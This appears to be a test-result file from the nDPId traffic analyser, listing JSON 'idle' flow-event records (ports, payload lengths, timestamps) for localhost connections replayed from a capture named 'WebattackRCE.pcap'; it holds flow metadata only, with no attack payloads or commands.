+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7560000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7560000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7560000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7560000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7560000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7560000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7560000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7560000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7560000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7560000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":228,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 